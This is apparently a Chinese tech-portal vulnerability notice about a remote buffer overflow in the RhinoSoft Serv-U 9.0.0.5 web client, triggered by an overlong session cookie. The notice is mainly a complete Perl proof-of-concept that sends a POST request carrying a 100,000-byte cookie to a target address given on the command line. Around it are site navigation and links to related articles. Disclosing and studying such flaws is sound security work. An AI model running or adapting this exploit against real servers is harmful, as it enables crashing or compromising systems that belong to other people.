51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

Serv-U Web客户端HTTP请求远程溢出漏洞

作者:佚名
安全 漏洞
远程溢出##远程攻击##立即处理[msg]Serv-U Web客户端HTTP请求远程溢出漏洞 影响版本: RhinoSoft Serv-U 9.0.0.5漏洞描述: BUGTRAQ ID: 36895

Serv-U Web客户端HTTP请求远程溢出漏洞

影响版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。 

---snip--- 
use IO::Socket; 

$|=1; 
$a = "A" x 100000; 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '80', 
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n" 
."Host: $ARGV[0]\r\n" 
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n" 
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" 
."Content-Length: 0\r\n\r\n"; 

while (<$sock>) { 
    print; 
} 
---snip---

【编辑推荐】

  1. C'Nedra网络插件Read_TCP_String远程溢出漏洞
  2. 利用MS08067远程溢出漏洞抓肉鸡
  3. Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞
责任编辑:安泉 来源: 黑客防线
漏洞补丁
相关推荐
Serv-U套件发现远程代码执行漏洞 SolarWinds敦促客户尽快打补丁
SolarWinds公司敦促客户尽快安装补丁,以修复ServU远程代码执行漏洞。目前已经有相关证据表明该漏洞被“单一威胁行为者”利用,并且已经对少部分客户发起了攻击。

2021-07-13 12:44:43

漏洞网络安全网络攻击
安全宝对Serv-U FTP 7.3零日漏洞的分析
ServUFTPServer0day漏洞是一个ServU远程目录遍历漏洞,20111201公布。该漏洞最终可以导致远程目录遍历漏洞,可以覆盖、下载任意文件。

2011-12-13 11:08:00

Serv-U对Sniffer嗅探/防范测试(图)
SERVU是一款很普及的FTP工具,利用其搭建FTP服务器非常简单。但是默认配置下SERVU用21端口提供FTP服务,并且数据没有进行任何的加密是明文传递。因此,一个恶意用户可以通过sniffer工具获取FTP用户的帐户和密码。下面,我们部署环境进行SERVU的Sniffer测试。

2009-07-15 14:19:07

Serv-U的FTP服务器设定过程
现在我们来对ServU的FTP服务器架构的设置内容进行一个全面的分析。首先让我们了解一下在ServU窗口中如何建立一个服务。

2010-06-30 14:36:03

Serv-U的FTP服务器建设简介
ServU的FTP服务器架构内容,我们在文章中来做一个简要的介绍,首先还是来看一看ServU软件的功能,以及它是如何进行服务器架构的简单过程。

2010-06-30 14:32:53

Serv-UFTP服务器
Serv-U中的FTP服务器账号管理
对于ServU中的FTP服务器账号管理,我们本文来详细介绍一下。首先,我们需要在SETUP中找到用户管理的窗口,之后对于如何创建一个账号,请大家从文中来详细了解一下吧。

2010-06-30 14:41:08

Serv-UFTP服务器
Spring Boot 不同HTTP客户端 同步&异步请求对比
我们通过调用CloseableHttpClient类上的execute()方法对应用程序接口进行同步调用,该方法将使用StringEntity实例填充的HttpPost对象作为输入参数。

2024-10-16 08:51:57

OpenVPN桌面客户端爆CSRF漏洞
Consult的安全研究员发现OpenVPN的桌面客户端存在CSRF漏洞。成功利用该漏洞,可以实现远程命令执行。openvpn已经发布公告,建议受影响的客户端版本立刻升级到最新版。

2014-07-17 15:47:52

Serv-U下FTP服务器的实时监控和日志
下面我们来对ServU的FTP服务器的实时监控和设置服务器端日志记录相关内容进行一下介绍。那么具体内容请大家浏览下文。

2010-06-30 14:55:56

Serv-UFTP服务器
Serv-U FTP服务器中的外部连接和设置
文章摘要:下面我们介绍一下ServU的FTP服务器的外部连接和设置上传和下载比例的相关内容。希望对大家有用。

2010-06-30 14:59:08

Serv-UFTP服务器
盘点常用语言HTTP请求客户端的惊艳框架
对于前后端交互的应用,http请求可以说是最重要的功能,而庆幸地是各个语言对于客户端请求都有非常好用的库来使用,今天我们就来盘点一下各个语言中那些惊艳的http请求库。

2021-05-21 10:48:09

http语言开发
优秀 Linux 远程桌面客户端
一个适用于Ubuntu和其他Linux发行版的最佳远程桌面客户端的列表。

2022-11-28 14:15:03

Serv-U:快速构建功能强大的FTP服务器
本文章详细的介绍如何在最短的时间内建立起一个完备的FTP服务器,除了具体的安装和配置说明外,文中还将涉及一些使用FTP所必须了解的相关知识,希望能够对广大网友有所帮助。

2009-02-27 13:16:00

STARTTLS相关漏洞影响多个邮件客户端
由于历史原因,邮件协议中并没有直接使用TLS协议而是通过STARTTLS来进行协商。

2021-08-22 14:52:00

漏洞网络安全网络攻击
VMware vSphere Web客户端特征详解
本文介绍了VMwarevSphereWeb客户端的优势与劣势,以及VSphereWeb客户端安装需求。

2013-06-08 09:59:15

VMwarevSphere Web
Golang 语言极简 HTTP 客户端 GoRequest
GoRequest是一个极简的HTTP客户端,作者灵感来源于Node.js库SuperAgent。相比Golang标准库nethttp,GoRequest使用起来更加简单。GoRequest官方的口号是“像机枪一样发送请求”。

2021-10-18 05:00:38

语言GoRequestHTTP
HTTP客户端连接,选择HttpClient还是OkHttp?
根据关键字httpclient和okhttp的区别、性能比较进行搜索,没有找到想要的答案,于是就去overstackflow上看看是不是有人问过这个问题,果然不会让你失望的。

2020-03-24 15:15:29

HttpClientOkHttpJava
Skype服务再次宕机 Windows客户端漏洞导致
Skype昨日再次发生宕机事故,虽然微软收购Skype的交易尚未完成,但是此次宕机事故主要是因Skype的Windows客户端软件中的一个漏洞造成的。因此,许多用户认为微软应该为此负责。

2011-06-08 14:30:54

SkypeWindows微软
如何使用JSPanda扫描客户端原型污染漏洞
JSPanda是一款功能强大的客户端原型污染漏洞扫描工具,该工具可以对从源代码中收集的所有单词进行污染操作,并将其显示在屏幕上。

2021-11-15 06:00:14

JSPanda扫描漏洞
httpx:一个 Python Web 客户端
Python的httpx包是一个用于HTTP交互的一个优秀且灵活的模块。

2022-03-14 09:35:43

Pythonhttpx
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服